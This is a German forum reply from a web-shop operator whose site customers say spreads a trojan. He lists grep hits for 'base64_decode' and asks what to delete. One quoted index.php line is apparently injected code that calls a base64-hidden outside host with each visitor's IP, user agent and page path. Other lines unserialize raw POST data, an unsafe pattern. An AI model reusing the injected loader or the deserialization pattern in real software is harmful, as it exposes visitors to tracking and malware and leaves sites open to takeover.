Antwort #36 am: 03. August 2012, 16:28:52
also als ich nur nach "eavl" gesucht habe, hatte er mir 626 hits in 103 files angezeigt, das ist aber verfälscht da er auch Kundenandressen etc angezeigt hat.
also ich nur nach "base64_decode" gesucht habe, hat er 6 hits in 4 files gefunden.
Hier die Auswertung
...shop\admin\xtbooster.php (3 hits)
Line 99: $ITEM_ID = unserialize(base64_decode($_POST['request']));
Line 269: $item['PRODUCT_ID'] = implode(unserialize(base64_decode($_POST['request'])));
Line 272: { $item = unserialize(base64_decode($_POST['request'])); }
...shop\includes\classes\xtbooster.php (1 hits)
Line 87: if($val[0]=='-'&&$val[1]=='=') $val = trim(base64_decode(substr($val,2,strlen($val)-2)));
...shop\includes\iclear\nusoap.php (1 hits)
Line 6269: return base64_decode($value);
...shop\index.php (1 hits)
Line 77: $stCurlLink = base64_decode( 'aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
was mache ich jetzt damit? einfach raus löschen? wenn ja was muss ich da genau löschen und muss ich noch was anderes schauen?
Ich habe heute erneut eine Nachricht von einem Kunden bekommen das er sich einen Trojaner von der Seite eingefangen hat aber mein Virenprogramm zeigt mir nichts an. Nur den Link den ich oben gepostet hat. Ich bin so langsam am verzweifeln. was kann ich denn noch unternehmen?